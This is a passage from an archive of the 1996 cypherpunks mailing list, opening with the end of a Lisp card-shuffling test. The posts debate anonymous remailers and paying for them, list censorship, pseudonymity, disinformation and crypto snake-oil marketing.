  "Shuffles trials decks of maximum size max-deck-size and verifies
that their order may be reconstructed from the unique number we compute."
  (do ((trial-number 0 (1+ trial-number)))
      ((= trials trial-number) t)
    (test-one-deck (1+ (random max-deck-size)))))

(defun complete-combination-test ()
  "Good test of all the card combination routines."
  (format t "Performing exhaustive test.~%")
  (exhaustively-test-card-combinations 6)
  (format t "Performing random test on large decks.~%")
  (test-many-decks 10 100))

;; (Exercise Answer: (4 2 1 3 0) = 111)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Thu, 14 Nov 1996 12:16:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Q.E.D |= Montgolfiering + Inbongis + Fermented Pear Juice
Message-ID: <199611142016.PAA32984@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com, perry@piermont.com,
 cmcurtin@research.megasoft.com
Date: Fri Nov 15 03:15:03 1996
- From http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html

...

Snake-Oil Warning Signs 

...

     Technobabble 

     If the vendor's description appears to be confusing nonsense, it may 
very well be so, even to an expert in the field. One sign of technobabble is 
a description which uses newly invented terms or trademarked terms without 
actually explaining how the system works. Technobabble is a good way to 
confuse a potential user and to mask the vendor's own lack of expertise. 

     And consider this: if the marketing material isn't clear, why expect 
the instruction manual to be any better? Even the best product can be 
useless if it isn't applied properly. If you can't understand what a vendor 
is saying, you're probably better off finding something that makes more 
sense. 
...

Dear Matt,

Maybe something about needing a thesaurus to translate their marketing stuff 
needs to be added to this. ;)
JMR


Please note new 2000bit PGPkey & new address <jmr@shopmiami.com>
This key will be valid through election day 2000.
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71
Please avoid using old 1024bit PGPkey E9BD6D35 anymore. Thanks.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMowmjDUhsGSn1j2pAQE8+AfNFzbsFx76mrkA8h2KruRspX3T23s6xla2
Vi7dbHBsFlRe5H6rpZ/deUYY4w9TYZ3ItV5uD6Gk6NQwh72Qv2x9CBnBaf0Sp6gO
Zjym5LxM0tyvAcbmLCkAIGf96LSuCbg5/MnRKwlvxyXKyQVzXtQ979i8WlUqRS8j
Qst/fZPeO8pTWGo7E37Ag44c69csPAwlSZbBgKsEONdt9Z5aIKfphjDmLWoVCTa+
pYhP3F1EZvGP9EaG4oVXYv0W+ZzsFDqO8uc+wCuTPl4/1Vdp+XK2W8M7yy5twGey
08tqJ5XMTUGWzsW2/90mLsmEHh6J0o0KkNVjKBexED/MKw==
=SzY/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Thu, 14 Nov 1996 12:25:34 -0800 (PST)
To: Jim Ray <jmr@shopmiami.com>
Subject: Re: Q.E.D |= Montgolfiering + Inbongis + Fermented Pear Juice
In-Reply-To: <199611142016.PAA32984@osceola.gate.net>
Message-ID: <199611142018.PAA05542@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Hi Jim.

>>>>> "Jim" == Jim Ray <jmr@shopmiami.com> writes:

Jim> Maybe something about needing a thesaurus to translate their
Jim> marketing stuff needs to be added to this. ;)

I was actually thinking of linking to a page that is basically a CGI
version of the "travesty" Perl script. I'll have it take some
crypto-related words from a local online file, then when the user hits
a button, it'll create a one paragraph marketing-sounding blurb about
crypto.

The test, of course, is to see if the marketing material of a given
product sounds too much like pseudorandom gibberish :-)

- -- 
Matt Curtin  cmcurtin@research.megasoft.com  Megasoft, Inc   Chief Scientist
http://www.research.megasoft.com/people/cmcurtin/   I speak only for myself.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Have you encrypted your data today?

iQEVAwUBMot+T36R34u/f3zNAQEV3Qf8C/zBETxHH6uUs0/qy507g0fTLNcom9lV
WX9/I3ozNpgFWAMyrqCSpPy3lmUHtNrbjGguA+/AAtC9DQYn8MEbhpLGz/Z9QGn5
QSo0VBW995yOTxCiWAFFHTy+47ehdoUzVz+zk1BlQSd1h5Z+Z8ycOxAgXu6wtkj/
hANSGa7hRavFG2JD+M6wx1IdajQcQngyTK4M9zJlxBRQwY+mMfD2LfENqZAXbrfl
dnqrnY3i8FBerK4wuIahFuhkFtUqq3pv5PR49vIgc9xjJWUpGlRnorKNxo7qmBPg
kj6/sBcFLHgvd57j2wRK+KUrWEH1KBWx1H8PhanHMc0/3BjNVJLjtA==
=OEu+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jw250@columbia.edu>
Date: Thu, 14 Nov 1996 12:24:48 -0800 (PST)
Subject: Re: Dossier on Tim May is Easily Obtainable
In-Reply-To: <199611140434.UAA19210@toad.com>
Message-ID: <Pine.SUN.3.95L.961114152017.5396B-100000@merhaba.cc.columbia.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Sean Roach wrote:

> Ball lightning?  Plasma weapon?  Could I have a copy of the schematics?
> I've long been interested in obtaining (purchasing, building) a plasma
> weapon.  (I'm also been interested in obtaining a EM pulse cannon, but
> that's a different story.)

from fortune(6):

	``What this country needs is a good $5 plasma weapon."

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Thu, 14 Nov 1996 15:53:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News [NOISE] [MOMMY]
In-Reply-To: <199611131951.LAA16239@kachina.jetcafe.org>
Message-ID: <328BAB81.5EC0@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Hayes wrote:
> 
> > Cypher-Censored
> > By Declan McCullagh (declan@well.com)[...]
> A need for attention can be overcome by refraining from the denial
> that the need exists, followed by careful observation of that need.
> More can be said on this, but this is not the forum. Such a need
> is not and should never be a reason for censorship.

In other words, Dave Hayes wants his mommy.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Thu, 14 Nov 1996 07:34:04 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.GSO.3.95.961112093119.7009B-100000@well.com>
Message-ID: <19961114153226.3621.qmail@desk.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


 > So you disagree.  Well, the last sentence above says it all - this "list"
 > that you and 1900+ other people spend so much time on is "just property"
 > (like a slave), it's censorable (meaning freedom of speech is *specifically
 > excluded*), and it's terminable without notice (meaning that it's really
 > just one person's private fantasy, and we'll all bozos on the bus, as it were).

Yup.  Clearly, then you will wish to start your own mailing list,
which you will promise is not property, not censorable, and not
terminable without notice.  Do it!  Don't let us tell you you can't
(not that anyone is)!  I suspect that you will quickly change your
opinion of mailing list owners.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software sells network driver support    | PGP ok
521 Pleasant Valley Rd. | +1 315 268 1925 voice | The more corrupt the state,
Potsdam, NY 13676-3213  | +1 315 268 9201 FAX   | the more numerous the laws.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 14 Nov 1996 15:44:26 -0800 (PST)
To: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Subject: Remailer Pricing
Message-ID: <v02140b07aeb1587ebcaf@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:02 PM 11/14/1996, Mullen Patrick wrote:
>Peter Hendrickson switched the transistors to say:
>> E-cash, the product licensed by Digicash, offers full payee anonymity and
>> would be an ideal candidate.

> Oops.  I forgot.  :-)  I guess this idea would work.  But, there would be a
> very large price for anonymity - two mailers holding their hands out for a
> piece of the pie.

> Well, I must admit you seem to have this idea pretty well thought out, and
> it just may work.  The hardest part of the plan would probably be gaining
> acceptance.  True, everyone loves getting a check, especially if all they
> had to do was open and close email to have it register as being read, but
> the hard part is getting people to accept having to pay to send someone a
> message.  Of course, there's the argument that currently we pay for stamps...
> :-)

It looks like I wasn't perfectly clear again.  Sorry about that.  The user
does not tell anybody whether or not the mail has been read.  In fact,
it's nobody's business but their own.  This is the advertiser's problem,
and I don't really care whether they solve it.  In fact, the user does
not have to put the remailer on the accept list.  He or she just has
to tell the remailer operator that they would like to receive a dollar
(or whatever) if the remailer operator sends them any mail.

Perhaps we've been thinking about anonymous mail the wrong way.  Is it
like the U.S. Post Office where you have to physically go someplace,
buy a stamp, physically write your message, put it in a physical envelope,
carry it to a box someplace, and then wait (maybe four days) for it to
arrive, all for "only" 32 cents?  Or is it more like Federal Express
where you pay 20 bucks and it arrives the next day, for sure, every time?

Earlier today somebody sent a message about his scary former employers
and (apparently) how they just kill people.  Would that person pay, say,
$5 to have the message delivered reliably and very anonymously?  My
judgement is that it would be worth every penny, and probably more.

Right now the remailer network is a mess.  There just aren't that many
remailers operating in a timely and reliable manner.  I am not knocking
the remailer operators for this, it's just clear that "free" doesn't
make it worth their while to keep the remailers operating perfectly
at all times.

It is especially important that anonymous mail be delivered in a timely
and reliable manner because you probably will not have a good way to
verify that it arrived.  And reliability is absolutely required if
you are chaining remailers because errors multiply.  The top five
remailers in Raph's latest report had these reliabilities: 99.77%,
99.28%, 99.23%, 99.18%, and 98.78%.  If you chain those remailers, your
failure rate is 3.71%, which is just too high.

And, the long delays in sending messages through the remailers make it
hard for people to get up and running because it takes hours to determine
whether it worked, if it worked at all.

Furthermore, many remailers don't use 2048-bit keys.  Why not?  Because
they don't want to spend money on the cycles.  That's okay with me -
it's charity.  But, if I pay a dollar for a remailer, I can expect
to be able to use a very strong key.

A good pricing strategy for remailers would be to charge, say, $1 for
instant delivery, $.50 for 30 minute delivery, etc.  To generate
interest, 4 hour delays could be imposed for free remailing, if the
resources are available.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: newtonm@papa.uncp.edu
Date: Thu, 14 Nov 1996 12:57:41 -0800 (PST)
To: CYPHERPUNKS@toad.com
Subject: ??????????????????????
Message-ID: <009AB5CC.FF1721B2.131@papa.uncp.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have a breif question for all you folks out there.... 
Does anyone know the email address and procedure for sending your mail via
"cypherpunks" so that it changes your e-mail address so that the person 
recieving your e-mail message sees on the mesage that its only from
an anonymous source?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Thu, 14 Nov 1996 16:48:59 -0800 (PST)
To: aga <cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611150046.QAA20765@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Wed, 13 Nov 1996, Mark M. wrote:

>> Mark
>> - -- 
>> finger -l for PGP key
>> PGP encrypted mail prefered.

To which, at 08:42 AM 11/14/96 -0500, aga wrote:

>Why?  Are you a criminal?
>What are you hiding behind your PGP?

Okay, I'll bite.  Where is it said that a person who wants h[is,er] privacy
is a criminal?  Charlie McCarthy might have said that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 14 Nov 1996 23:55:53 -0800 (PST)
To: roach_s@alph.swosu.edu
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611141540.HAA05676@toad.com>
Message-ID: <199611141649.QAA00383@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Sean Roach <roach_s@alph.swosu.edu> writes:
> At 05:22 PM 11/13/96 GMT, Adam Back wrote:
> ...
> >Nym sues nym.  I think not.  An alternate view of slander law suits is
> >as a way to encourage the use of Nyms.  Certainly the dissenters of
> >the unnamed pseudo religious have learnt the value of nyms, remailers
> >and so forth.  There are distinct advantages to nyms.
> ...
> They learned the value all right.  Right up to the time that one of the
> founding remailers disclosed thier return addresses to save the rest of the
> hard drive.  There are definate advantages to TRULY anonymous remailers too.
> Ones where the return address is not stored.  

Yep.  Some people even voiced the opinion that it was a good thing
that penet closed down, because now people would have to use better
remailers.  At the time the first address was released from penet
their was discussion of the cypherpunks type I remailers.  The ease of
use isn't there though.  Alpha and newnym remailers are provide
replyable email addresses and are much better than penet, though also
not perfect.

Ease of use seems to be a huge requirement for many people, which is
presumably what lead to penets success.  Programs like private Idaho
mean that there is little excuse for not using real remailers.

> For mailing lists and newsgroups, where you are going to get
> conformation on your post when its relayed to you, why do you need
> the return address anyway?  Someone inside the group uses a
> remailer, just post your comments to the list, that person will most
> likely see it there.  I assume that these already exist somewhere.

People have done this (even with messages encrypted to the recipient
only) eg Pr0duct Cypher <cypherpunks@toad.com>, Henry Hastur
<alt.security.pgp>.  This is also the purpose, I believe, of the
alt.anonymous.messages newsgroup.

A good remailer reference is Galactus:

	http://www.stack.urc.tue.nl/~galactus/remailers/

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Newsletter <vedekgar@compcurr.com>
Date: Thu, 14 Nov 1996 21:25:50 -0800 (PST)
To: Multiple recipients of list NEWSLETTER             <NEWSLETTER@MAIL.COMPCURR.COM>
Subject: Inside Currents Vol. 1, No. 6
Message-ID: <3.0.32.19961114171734.009b8210@mail.compcurr.com>
MIME-Version: 1.0
Content-Type: text/plain


*******************************************************
Inside Currents
Vol 1, No. 6
November 1996

This is the electronic newsletter you requested when 
you joined Computer Currents Interactive at
http://www.currents.net.  
*******************************************************

If you would like to REMOVE yourself from this 
newsletter mailing list, you may send an "unsubscribe" 
message to Computer Currents Interactive.

***To unsubscribe, address your message to 
listserv@compcurr.com.  Leave the subject area 
in the header blank.  In the body, simply type 

unsubscribe newsletter

For security reasons you will then receive a message asking
you to confirm your actions by replying with an "ok"
(without quotes) in the body of your message.

If this newsletter has been forwarded to you 
and you wish to SUBSCRIBE, you may join 
Computer Currents Interactive at 
http://www.currents.net.

If you have any further questions, 
please send a message to insidecurrents@compcurr.com.


*******************************************************
IN THIS INSIDE CURRENTS:

1. Our online computer forums are up and running. Get some free advice!
        http://www.currents.net/

2. We've launched a new section: The Computer Advisor
        http://www.currents.net/cciu/advisor/advisor.html

3.  If you're looking to buy computer equipment, try NetQuote.
        http://www.currents.net/services/netquote/netquote.html

4.  BookPoint: We've made it easier for you to buy books in our online
database
        http://www.bookpoint.com/

5. COMDEX-Meet us in Las Vegas at the biggest computer show in the country.
*******************************************************


1. Get some free advice: Our online computer forums are up and running.

We've opened up our bulletin boards to give Computer Currents Interactive
users some free advice.  Our online forums are fast becoming the best place
to stop in with your computer questions and to share your experience and
compare notes with others.  Watch for advice from our computer
advisors-industry experts who will help you get the most out of your computer.

        http://www.currents.net/


2. We've launched a new section: The Computer Advisor

In our newly redesigned Computer Advisor section, you'll find state-of-the
industry news and reviews, along with simple how -to materials to help you
use your computer to its best advantage.  We also offer up HelpLinks to the
most helpful sites on the web.

        http://www.currents.net/cciu/advisor/advisor.html


3.  If you're looking to buy computer equipment, try NetQuote.

Our easy-to-use service brings computer stores to you. You tell us what kind
of equipment you want. We'll send your specifications out to stores in your
area, and they'll contact you with a price quote. It's minimum-effort
comparison shopping, exclusively for our members

        http://www.currents.net/services/netquote/netquote.html


4.  BookPoint: We've made it easier for you to buy books in our online
database

Beginning this week, you'll find current computer-related bestseller
books available online at a 10% discount.  Also in BookPoint (our partnership
with Stacey's Professional Bookstore) you can access our growing database of
professional books.  All the books are available to CCI members at a discount.

        http://www.bookpoint.com/books/picks.html


5. COMDEX-Meet us in Las Vegas at the biggest computer trade show in the
country

It's the biggest computer tribal gathering of the year, and we'll be at
Pavilion #4, booth #P4705 just outside of the Las Vegas Convention Center.
Stop by to meet our staff, tell us what you like (and dislike) about our
site and what you'd like to see more of in the future. Viva Las Vegas!

*******************************************************
Computer Currents Interactive   http://www.currents.net

*******************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 14 Nov 1996 17:51:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cryptoanarchy in the field
Message-ID: <199611150137.RAA16422@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 5:44 AM 11/13/1996, Adam Back wrote:
>>What we need is an experiment.  Let's pick a country with a near
>>police state and design a system so that people in that country
>>can freely and securely communicate with each other and the outside
>>world with minimal chance of arrest.  Once the system is available,
>>we can see if it succeeds in the field.  I'll leave others to
>>suggest the target.
>
>I would suggest starting with remailers, rather than interactive
>traffic such as web traffic would be the easier target.  Might even
>present a positive spin in the press for anonymity and remailers for a
>change.

Positive publicity?  How about Iraq?  What kind of computer equipment does
the Army have?  What happens when the Iraqi Army suddenly becomes able
to conspire?

What if they were provided only with authentication of anonymous
identities.  How much could they do with "underground newspapers"
that traveled on sneaker net?

>So what good stego techniques are there for text.  Do singaporeans use
>a non ascii character set?  (As the Chinese use things like Big5
>encoding). Anyone know of any features of the character set that
>Singaporeans use which could be used for a subliminal channel?

How many people in Singapore speak English?

>Sure, if you keep cypherpunks list going even after crypto discussions
>have been outlawed, you can keep discussions, and then the ammount of
>ecash usage, and bandwidth may be more condusive to working out
>anonymous payment systems.

Pornography is a powerful motivator that need not involve money.
The CIA used to trade porn for secrets during the Cold War.  It seems
low ranking Russian officers used it to reward obedient young soldiers
who were not allowed to leave custody during their first two years
of service.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Thu, 14 Nov 1996 10:05:52 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199611141806.LAA02189@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


Benjamin Grosman <bgrosman@healey.com.au>
Subject: Re: Worrying...
In-Reply-To: <199611140830.TAA26347@sydney.healey.com.au>
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.16 

In <199611140830.TAA26347@sydney.healey.com.au>, on 11/14/96 
   at 07:30 PM, Benjamin Grosman <bgrosman@healey.com.au> said:

-.Isn't it worrying that so many people can happily devote their time 
-.to trying to annoy others?

        well, 40 years ago when I was still an innocent farm child...

    then                            today

    people are basically good.      ...until money is involved.
    of course it's legal.           ...but is it moral? 
    ...things were only fattening.  ...immorality: not getting in on the take
    no need for film ratings        ...is it R, NC, or XXX?
    OK, until proven otherwise      ...God gets credit, the rest pay cash                               

        then there are the the flaming liberals, the Better Red than 
    Deads, the Sierra Club, the ADL, 'THE' Weisman, Arafat, whatever the
    hardline premier 'friend' of Arafat  --and certainly we must include
    the absolute amorality of Bubba and Bitch.

        actually, I can handle a few of the obnoxious.  if they are remote,
    who cares?  if they get too close and persist --well, there are means
    and there are means.
  
--
    Cyberspace and Information are Freedom!  
        FUCK your WIPO, too. 
                -attila





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Thu, 14 Nov 1996 15:46:09 -0800 (PST)
To: "Peter Hendrickson" <ph@netcom.com>
Subject: RE: Remailer Abuse Solutions
Message-ID: <n1364127665.90445@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson switched the transistors to say:
>> While I hope this plan won't ever be necessary, at least not on such a
>> global scale, the application of such techniques toward a mailing list
>> sounds decent.

>This may sound like a quibble, but it really isn't: I am not talking about
>a global scale at all.  A very small group of people can make use of
>this technology successfully.  It doesn't matter whether everybody in
>the world uses it or just people who are tired of spam - it still works.

Yeah, I knew I used a bad choice of words.  I meant global as in "all-
encompassing" rather than the geographical definition.

>However, if you restrict postings to an approved group of people, perhaps
>everybody on the mailing list, you can eliminate spam.  How, then, do we
>allow anonymous postings to come through?  Individual people on the list
>can receive the proposed post and forward it to the list if it is
>appropriate.  They could even charge a fee for doing it.  That's easy to
>do if there is a "paying" remailer which will handle the money for them.

>> Which brings up another topic:  How would an anonymous remailer operate?
>> It's hard to eliminate an audit trail when there is some monetary tie back
>> to you, whether it be credit card, ecash (assuming they never quite figure
>> out anonymizing it), ...

>I assumed untraceable cash transactions for small amounts were available.

>E-cash, the product licensed by Digicash, offers full payee anonymity and
>would be an ideal candidate.

Oops.  I forgot.  :-)  I guess this idea would work.  But, there would be a
very large price for anonymity - two mailers holding their hands out for a 
piece of the pie.

Well, I must admit you seem to have this idea pretty well thought out, and 
it just may work.  The hardest part of the plan would probably be gaining
acceptance.  True, everyone loves getting a check, especially if all they
had to do was open and close email to have it register as being read, but
the hard part is getting people to accept having to pay to send someone a
message.  Of course, there's the argument that currently we pay for stamps...
:-)

PM

>Peter Hendrickson
>ph@netcom.com



------------------ RFC822 Header Follows ------------------
Received: by mail.ndhm.gtegsc.com with SMTP;14 Nov 1996 17:46:22 -0400
Received: from netcom18.netcom.com by delphi.ndhm.gtegsc.com with SMTP;
          Thu, 14 Nov 1996 22:42:05 GMT
Received: from [192.0.2.1] (ph@netcom3.netcom.com [192.100.81.103]) by
netcom18.netcom.com (8.6.13/Netcom)
	id OAA05098; Thu, 14 Nov 1996 14:40:19 -0800
X-Sender: ph@netcom15.netcom.com
Message-Id: <v02140b05aeb13a70acf4@[192.0.2.1]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 14 Nov 1996 14:40:29 -0800
To: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
From: ph@netcom.com (Peter Hendrickson)
Subject: RE: Remailer Abuse Solutions
Cc: "Cypherpunks" <cypherpunks@toad.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Thu, 14 Nov 1996 18:47:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The persistance of reputation
In-Reply-To: <v03007800aea91c1473f2@[206.119.69.46]>
Message-ID: <328BD9B5.3AAF@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wrote:
> 
> At 8:02 pm -0500 11/11/96, Rich Graves wrote:
> 
> >You people are wimps. The only real effect of the good doctor's rants
> >has been, as Mr. May indicated, to get the good doctor on the "don't
> >hire" list.
> 
> Sorry. I wasn't clear. My tongue was planted firmly in cheek there.
> I'm "frequently tempted" in the same way I'm "frequently tempted" to
> rip someone's head off and shit down their neck.

Sorry for the misinterpretation. Clearly your reputation has not 
persisted in my mind with sufficent clarity since the last time I was 
involved in a cypherpunks discussion. (Or possibly this issue has 
brought together such strange bedfollows that I'm ready to believe that 
anything is possible.)

> >People are just going to have to be smarter than they've ever been.
> >The Net enables sharing and verifying real information just as it
> >enables disinformation. Sure disinformation will always be cheaper to 
> >produce and more appealing to the eye (fact is harder to accept than 
> >fiction because fictional plots are written to make sense), but 
> >disinformation tends to cancel itself out.
> 
> I agree, but, I think that, in the long run, disinformation may cost 
> more. Lying always involves more work, and thus cost, than telling the 
> truth. In order to support a lie you have to keep weaving a coherent 
> tissue of other lies around the original lie to support it, all of 
> which makes the original lie more and more non-plausible. In other 
> words, the more "resolution" you get on a lie, the more it looks like
> a lie.

I disagree. You're assuming that you're dealing with a rational person 
who wants to be believed. It is not difficult to come up with examples 
of pure disinformation that is just "thrown out there" and never 
supported. Keep repeating the same lie, and *nonspecialists* will assume 
that there is a "debate" going on. To take an example that won't make me 
sound "politically correct," let's say the national security 
establishment tries to spread the rumor that the remailers are run by 
spooks (we've all seen the rumor; I'm not arguing and do not really 
believe that the rumor was started by spooks, but let's assume for the 
sake of argument that it was). *We* all know that this is nonsense; but 
*nonspecialists* and journalists will seize on "the controversy," and 
the perception of danger will create a real chilling effect on remailer 
use. There are still people out there who refuse to use any version of 
PGP after 2.3 because of such repeated rumors. Absolutely no one is 
trying to back them up with more complex lies; but the rumor persists.

> Maybe that's the "cancel itself out" you're talking about.

No, actually I meant that competing propaganda tends to kill itself -- 
normal people tend just to throw up their hands and say "What the hell 
does it matter anyway" -- but your interpretation is worth talking 
about, too.

> Of course, that implies critical thinking on the part of the listener,
> or at least access to critical information, which is what the net
> provides at a cheap price, like you said.

No. It requires both. And sometimes, technical skill. How many people 
here know enough to evaluate the data concerning, to take a notorious 
example, the Kennedy assassination? I accept the historical consensus, 
but I know there are a lot of otherwise rational people on cypherpunks 
who are convinced that there was some sort of coverup (which sort, they 
often don't know or care; but they're conviced there was one). Oliver 
Stone got some ridiculous movie made based on this non-thesis (actually 
two, counting Nixon). People growing up today are learning pseudohistory 
and pseudoscience from Oliver Stone, "The X Files," "Dark Skies," and 
"Millenium." I find that scary. The net is better than TV, because it 
allows more responses, but I'm not sure how much better.

> So, maybe what we're saying here is that disinformation costs more
> than information, but if disinformer has more money, or at least
> communication resources, it'll be believed.

No, I think pure disinformation is cheaper. Period. And often, it 
doesn't have to be "believed" -- you just need to raise "suspicions" 
among nonspecialists. That is sufficent to destroy consensus and trust 
in social institutions. At the risk of sounding politically correct, how 
many nonspecialists "suspect" that the accepted history of the Holocaust 
*could* be a massive propaganda plot? (Yeah, yeah, I know the "soap 
stories" and the Polich Communists' exaggeration of the non-Jewish death 
toll at Auschwitz and all that rot, but I mean the basic facts, which 
are often denied. If you want to jump on this point, take it to 
alt.revisionism, which I read closely.) Absolutely no historians believe 
that, but lots of nonspecialists do. This doesn't mean that they believe 
it to be true; it just means that there's doubt. This kind of "doubt" is 
not the same as skepticism. Skepticism is good. Skeptical inquiry means 
you decide to take the time to investigate a story. Stubborn, cynical 
doubt, especially when based on ignorance and prejudice, is something 
else entirely.

> On a geodesic network, this is much harder, because centralized
> nodes choke on their information load, and can't spread lies as 
> cheaply as they can on a hierarchically controlled communication 
> network, like broadcast, or even print, media.

I disagree with two of your premises. Knowing several real journalists 
(as opposed to opinion columnists), I don't consider print or broadcast 
to be particularly hierarchical. The difficulty of propagating 
disinformation depends on whether you want people to believe, or merely 
"suspect." The TWA 800 friendly-fire fiction doesn't have to be accepted 
as definitely true for it to cause trouble. The "supicion" of Richard 
Jewell doesn't have to be accepted as definitely true for it to cause 
trouble. Disinformation is more often about sowing fear, uncertainty, 
and doubt than it is about belief. Sold the right way, it can propagate 
itself; the (IMO) disinformation that the CIA is directly responsible 
for the crack-cocaine epidemic is spread by radical blacks who see it as 
a racist crime, and by radical-right conspiracy mongers who want to tie 
Clinton to the Mena story. Either way, the meme virus spreads. How many 
different kinds of groups are saying how many different groups "created" 
the AIDS virus? You don't have to "believe" that it's true for the meme 
to spread.

> >The opposite of the Black Unicorn approach to nym safety is the Liz
> >Taylor approach: "As long as they spell my name right, I don't care."
> >Nobody I care about is going to listen to some crank, or if they do,
> >they'll email me to check the facts, or if they don't, I have
> >alternative outlets for information. As long as I live in a free 
> >country with a free Internet, they can't touch me.
> 
> Say 'amen' somebody. Reputation is reputation, nym or not. However, 
> nyms allow something very important. Since the net enables reputation 
> to persist (functionally) forever, nyms allow you to "start over", 
> much in the same way that geographic frontiers have functioned
> historically.

To some extent, but not fully. There is a certain cachet in being 
recognized as someone who uses "your real name."

"We pledge our lives, our fortunes, and our sacred honour."

"John Hancock."

> The paradox of ubiquitous network computing is it takes away privacy
> by creating persistant information accessable to anyone, while at the
> same time creating perfect pseudonymity and thus new reputation.

Pseudonymity is only perfect where artificial boundaries such as respect 
for netiquette are erected. If someone really wanted to track you down, 
they could either find you, or "out" you as a pseudonym "afraid to use 
your own name." Both can be damaging (to your reputation or otherwise). 
In order to put your life on the line for something, you need a life 
story.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 14 Nov 1996 16:47:05 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611140501.XAA05790@manifold.algebra.com>
Message-ID: <199611150101.TAA00362@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Dave Hayes wrote:
> > You won't do this, because I won't let you on the list. I, unlike you
> > or Mr. Gilmore, have the judgement on whom to invite to my list.
> So what's the difference between yours and gilmore's position?
> Long live USENET Cabal!

     Gilmore give you the rope and allows you to hang yourself. Hayes 
just shoots you between the eyes. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@pgp.com>
Date: Thu, 14 Nov 1996 19:08:55 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: One Big Telecoms Company
In-Reply-To: <3.0b36.32.19961114095406.007664e4@panix.com>
Message-ID: <v0310081aaeb180b92d26@[205.180.136.70]>
MIME-Version: 1.0
Content-Type: text/plain


In Reply to the Message wherein it was written:

[elided]
>If government monopolies can't hack it, what chance do private companies
>have?

Um, a _better_ one, now that government monopolies are largely out of the
way, leaving significant infrastructure for them to use? There's this one
